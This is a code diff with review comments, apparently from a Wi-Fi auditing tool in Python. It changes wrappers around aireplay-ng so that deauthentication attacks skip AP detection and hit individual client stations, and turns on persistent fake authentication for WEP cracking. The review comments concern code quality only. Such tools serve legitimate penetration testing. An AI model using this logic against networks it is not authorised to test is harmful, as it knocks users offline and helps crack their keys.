Enable persistent fakeauth, bypass AP detection when deauthing.
Bypassing AP detection should make 5GHz deauths work on all systems (should fix #24)
@@ -85,7 +85,7 @@ class Aireplay(Thread):
|
|||||||
|
|
||||||
def stop(self):
|
def stop(self):
|
||||||
''' Stops aireplay process '''
|
''' Stops aireplay process '''
|
||||||
if self.pid and self.pid.poll() == None:
|
if hasattr(self, "pid") and self.pid and self.pid.poll() == None:
|
||||||
self.pid.interrupt()
|
self.pid.interrupt()
|
||||||
|
|
||||||
def get_output(self):
|
def get_output(self):
|
||||||
@@ -322,17 +322,20 @@ class Aireplay(Thread):
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def deauth(target_bssid, client_mac=None, num_deauths=1, timeout=2):
|
def deauth(target_bssid, essid=None, client_mac=None, num_deauths=1, timeout=2):
|
||||||
deauth_cmd = [
|
deauth_cmd = [
|
||||||
'aireplay-ng',
|
"aireplay-ng",
|
||||||
'-0', # Deauthentication
|
"-0", # Deauthentication
|
||||||
str(num_deauths),
|
str(num_deauths),
|
||||||
'--ignore-negative-one',
|
"--ignore-negative-one",
|
||||||
'-a', target_bssid # Target AP
|
"-a", target_bssid, # Target AP
|
||||||
|
"-D" # Skip AP detection
|
||||||
]
|
]
|
||||||
if client_mac is not None:
|
if client_mac is not None:
|
||||||
# Station-specific deauth
|
# Station-specific deauth
|
||||||
deauth_cmd.extend(['-c', client_mac])
|
deauth_cmd.extend(["-c", client_mac])
|
||||||
|
if essid:
|
||||||
|
deauth_cmd.extend(["-e", essid])
|
||||||
deauth_cmd.append(Configuration.interface)
|
deauth_cmd.append(Configuration.interface)
|
||||||
proc = Process(deauth_cmd)
|
proc = Process(deauth_cmd)
|
||||||
while proc.poll() is None:
|
while proc.poll() is None:
|
||||||
|
|||||||
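Review bot: Inserting `essid` as the second positional parameter of `deauth` changes the meaning of any existing call that passes `client_mac` positionally: the station MAC would be sent as `-e` and no `-c` would be added. The callers visible on this page use keywords, but callers outside this diff may not, so appending the parameter keeps the signature backward-compatible: `def deauth(target_bssid, client_mac=None, num_deauths=1, timeout=2, essid=None):`. In `stop()`, the `hasattr(self, "pid")` guard would be unnecessary if `pid` were initialised to `None` in the constructor, and `self.pid.poll() is None` is the idiomatic comparison. The body of `deauth` continues past the end of the hunk.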
@@ -57,7 +57,7 @@ class AttackWEP(Attack):
|
|||||||
# Use our interface's MAC address for the attacks.
|
# Use our interface's MAC address for the attacks.
|
||||||
client_mac = Interface.get_mac()
|
client_mac = Interface.get_mac()
|
||||||
# Keep us authenticated
|
# Keep us authenticated
|
||||||
#fakeauth_proc = Aireplay(self.target, "fakeauth")
|
fakeauth_proc = Aireplay(self.target, "fakeauth")
|
||||||
elif len(airodump_target.clients) == 0:
|
elif len(airodump_target.clients) == 0:
|
||||||
# Failed to fakeauth, can't use our MAC.
|
# Failed to fakeauth, can't use our MAC.
|
||||||
# And there are no associated clients. Use one and tell the user.
|
# And there are no associated clients. Use one and tell the user.
|
||||||
@@ -85,12 +85,11 @@ class AttackWEP(Attack):
|
|||||||
while True:
|
while True:
|
||||||
airodump_target = self.wait_for_target(airodump)
|
airodump_target = self.wait_for_target(airodump)
|
||||||
status = "%d/{C}%d{W} IVs" % (airodump_target.ivs, Configuration.wep_crack_at_ivs)
|
status = "%d/{C}%d{W} IVs" % (airodump_target.ivs, Configuration.wep_crack_at_ivs)
|
||||||
'''
|
if fakeauth_proc:
|
||||||
if fakeauth_proc and fakeauth_proc.status:
|
if fakeauth_proc and fakeauth_proc.status:
|
||||||
status += ", {G}fakeauth{W}"
|
status += ", {G}fakeauth{W}"
|
||||||
else:
|
else:
|
||||||
status += ", {R}no-auth{W}"
|
status += ", {R}no-auth{W}"
|
||||||
'''
|
|
||||||
if aireplay.status is not None:
|
if aireplay.status is not None:
|
||||||
status += ", %s" % aireplay.status
|
status += ", %s" % aireplay.status
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
@@ -224,6 +223,9 @@ class AttackWEP(Attack):
|
|||||||
if self.user_wants_to_stop(attack_name, attacks_remaining, airodump_target):
|
if self.user_wants_to_stop(attack_name, attacks_remaining, airodump_target):
|
||||||
self.success = False
|
self.success = False
|
||||||
return self.success
|
return self.success
|
||||||
|
except Exception as e:
|
||||||
|
Color.pl("\n{+} {R}Error: {O}%s{W}" % e)
|
||||||
|
continue
|
||||||
# End of big try-catch
|
# End of big try-catch
|
||||||
# End of for-each-attack-type loop
|
# End of for-each-attack-type loop
|
||||||
|
|
||||||
@@ -263,12 +265,13 @@ class AttackWEP(Attack):
|
|||||||
if answer == 1:
|
if answer == 1:
|
||||||
# Deauth clients & retry
|
# Deauth clients & retry
|
||||||
num_deauths = 1
|
num_deauths = 1
|
||||||
|
Color.clear_entire_line()
|
||||||
Color.p("\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...")
|
Color.p("\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...")
|
||||||
Aireplay.deauth(target.bssid)
|
Aireplay.deauth(target.bssid, essid=target.essid)
|
||||||
for client in target.clients:
|
for client in target.clients:
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.p("\r{+} {O}Deauthenticating client {C}%s{W}..." % client.bssid)
|
Color.p("\r{+} {O}Deauthenticating client {C}%s{W}..." % client.station)
|
||||||
Aireplay.deauth(target.bssid)
|
Aireplay.deauth(target.bssid, client_mac=client.station, essid=target.essid)
|
||||||
num_deauths += 1
|
num_deauths += 1
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.pl("\r{+} Sent {C}%d {O}deauths{W}" % num_deauths)
|
Color.pl("\r{+} Sent {C}%d {O}deauths{W}" % num_deauths)
|
||||||
|
|||||||
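Review bot: The added `except Exception as e` at the end of the attack loop prints only `str(e)` and continues with the next attack type, so a programming error such as an AttributeError looks the same as a tool failure and the traceback is lost. The `try` body starts outside this hunk, so it is not visible whether the aireplay and fakeauth processes started for the failed attack are stopped before `continue`; if they are not, each failed attack could leave a child process running on the interface. Consider narrowing the exception type and stopping the started processes in the handler, for example `if fakeauth_proc: fakeauth_proc.stop()`. In the status hunk, the inner `if fakeauth_proc and fakeauth_proc.status:` repeats the outer `if fakeauth_proc:` test and can be reduced to `if fakeauth_proc.status:`.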
@@ -33,9 +33,7 @@ class AttackWPS(Attack):
|
|||||||
self.success = True
|
self.success = True
|
||||||
return self.success
|
return self.success
|
||||||
else:
|
else:
|
||||||
Color.pl(
|
Color.pl("{!} {R}your version of 'reaver' does not support the {O}WPS pixie-dust attack{W}")
|
||||||
'{!} {R}your version of "reaver" does not' +
|
|
||||||
' support the {O}WPS pixie-dust attack{W}')
|
|
||||||
|
|
||||||
if Configuration.pixie_only:
|
if Configuration.pixie_only:
|
||||||
Color.pl('\r{!} {O}--pixie{R} set, ignoring WPS-PIN attack{W}')
|
Color.pl('\r{!} {O}--pixie{R} set, ignoring WPS-PIN attack{W}')
|
||||||
|
|||||||